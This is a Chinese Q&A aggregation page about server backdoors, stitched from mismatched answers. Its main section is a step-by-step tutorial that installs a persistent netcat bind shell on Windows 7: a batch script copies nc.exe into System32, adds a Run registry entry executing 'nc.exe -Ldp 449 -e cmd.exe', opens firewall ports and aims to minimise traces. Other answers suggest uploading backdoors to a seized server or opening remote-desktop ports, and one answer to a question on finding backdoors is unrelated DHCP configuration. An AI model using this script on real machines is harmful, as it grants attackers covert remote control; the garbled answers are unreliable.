Ⅰ 伺服器里有後門程序怎麼辦
最簡單的辦法是打補丁 就是先把能堵的漏洞給堵了
然後找到後門的程序,如果不是必須運行程序的話,最好刪除
要是必須運行程序的話,建議用軟體屏蔽,或者隔離
Ⅱ 如何在Windows,Linux中安裝後門
0×00 准備工作
假設用戶以管理員許可權登錄系統,在Windows 7系統上使用netcat 創建一個後門。
Netcat 功能比較單一, 缺少了許多我們滲透工作中需要的功能。為此我們將創建一個攜帶型的工具包來解決這個問題 :
1.下載額外的文件和附加持續.
2.編輯修改指定文件.
3.快速創建執行後門.
4.控制遠程伺服器並進行惡作劇 :)
為了便於你第一時間獲取到你的工具包,你需要將它放置在一個獨立的U盤或者在線伺服器上。
攜帶型工具(Portable Applications)
攜帶型工具是那些不需要安裝就能直接使用的程序,它們往往將所有的執行環境和核心程序本身一同打包成一個獨立的文件,方便攜帶。在獨立文件執行的過程中會自行釋放額的需求文件,並構建一個可順利執行目標程序的環境。
1.不依賴特定的dll(dll已經打包)
2.不依賴注冊表設置(有可能自行初始化) ,不遺留下任何注冊表操作痕跡
3.操作痕跡最小化,盡量避免一切不必要的操作,導致留下過多的系統操作記錄
創建 Windows 7 工具集
gVim (跨平台的文本編輯器, 提供強大的命令行操作交互)
Wget (下載 windows 64 位版本)
Netcat
有Kali系統的可以用命令 「find / -name nc.exe」搜索到 http://www.kali.org/ 或者下載已經編譯好的版本 http://joncraton.org/blog/46/netcat-for-windows/
0×01初試 Netcat 後門
nc.exe -dLp 449 -e cmd.exe -L 這個選項會開啟一個監聽服務並等待客戶端連接, 在客戶端連接成功之後,會提供相應的交互服務。
– p 指定程序監聽的埠(非管理員許可權只能設置高於1024的埠. 同時不可復用現有埠)
– e 在接收到一個客戶端連接後, 會執行一個特定的程序(這里是cmd.exe), 這個程序負責接下來的會話交互(執行客戶端後期提交的任何命令)
– d 採取靜默監聽模式,避免nc運行過程中,產生過多額外的日誌信息
Windows 7 後門安裝批處理腳本
@echo off
Rem 拷貝文件到系統目錄
x "%systemdrive%\%username%\Desktop\nc.exe" "C:
\Windows\System32\" -y
Rem 修改注冊表,增加後門自啟動代碼.
reg add "HKLM\software\microsoft\windows\currentversion\run" /f /v "system" /t
REG_SZ /d "C:\windows\system32\nc.exe -Ldp 449 -e cmd.exe"
Rem 添加防火牆規則,開放監聽的449埠,允許外部連接.
netsh advfirewall firewall add rule name="Rule 34" dir=in action=allow
protocol=UDP localport=449
netsh advfirewall firewall add rule name="Rule 35" dir=in action=allow
protocol=TCP localport=449
Rem 添加防火牆規則,允許nc.exe對外提供連接.
netsh advfirewall firewall add rule name="Allow Messenger" dir=in action=allow
program="C:\windows\system32\nc.exe"
Ⅲ centos5.5版本的伺服器系統後門怎麼找出來
一、安裝配置dhcp [root@localhost ~]# yum -y install dhcp [root@localhost ~]# cd /usr/share/doc/dhcp-4"; DNS伺服器域名 option domain-name-servers 192.168.1.24; DNS伺服器的IP地址 default-lease-time 360000; 默認租約時間 max-lease-time 720000; 最大租約時間 ddns-update-style none; log-facility local7; subnet 192.168.1.0 netmask 255.255.255.0 { 分配的網段192.168.1.0/24 range 192.168.1.100 192.168.1.230; 分配的ip地址區間; option routers 192.168.1.1; 網關ip; option broadcast-address 192.168.1.255; 廣播地址; } host boss { boss為主機名,隨便取; hardware ethernet 00:0C:29:6C:A6:F8; 主機網卡的mac地址; fixed-address 192.168.1.10; 給其分配的ip; } [root@localhost ~]# /etc/init.d/dhcpd restart 關閉 dhcpd: [確定] 正在啟動 dhcpd: [確定] 三、查看埠監聽狀態 [root@localhost ~]# netstat -ltunp grep dhcpd udp 0 0 0.0.0.0:67 0.0.0.0:* 5346/dhcpd Linux系統下構建DHCP伺服器 /Linux/2013-06/86531.htm CentOS下配置主從DNS伺服器以及DHCP下的DDNS/Linux/2013-06/85634.htm SUSELinux 11 pxe+DHCP+tftp+ftp 無人值守安裝/Linux/2013-06/85481.htm Linux下架設DHCP伺服器過程及3種測試 /Linux/2013-05/84832.htm Linux上一步一步實現DHCP伺服器 /Linux/2013-04/82244.htm CentOS 6.5系統下構建DHCP伺服器 /Linux/2014-06/103203.htm
Ⅳ 我拿了一個伺服器,上面的網站我想留下個後門,怎麼弄,能不能詳細點,再iis如何讓修改她的網站內容
首先你不要存在僥幸心理,因為你遲早會被抓的。
既然已經拿下了伺服器,利用上傳工具不就可以上傳後門了嗎? 如果你懂網頁製作,相信也就會修改網頁了。
你這種行為是所有網路管理員的公敵。
強烈...
Ⅳ 怎麼給電腦(伺服器)留後門
好多後門呀、、真的很多、、一時間都想不起來。。
最簡單的開個3389或4899
我記得有一個TMD遠控。
反正我這上面顯示的是TMD
是不是我不知道、、
這個遠控的特點是..
服務端1K、、
留作後門的好幫手啊!
Ⅵ 遠程登陸 怎樣在伺服器上開後門或者種植木馬(有的話發給我),重分請教方法發到我郵箱[email protected]
你完全可以對登陸用戶進行許可權設置,限制用戶的操作行為啊。
木馬、後門程序自己私底下玩玩可以,用到工作中可是違法的。
Ⅶ iis是什麼 怎麼在iis伺服器留下永遠的後門
IIS是服務組件,如果你想做一個網站伺服器,你安裝了 服務操作系統 要想把網站發布出去 必須要這個組件!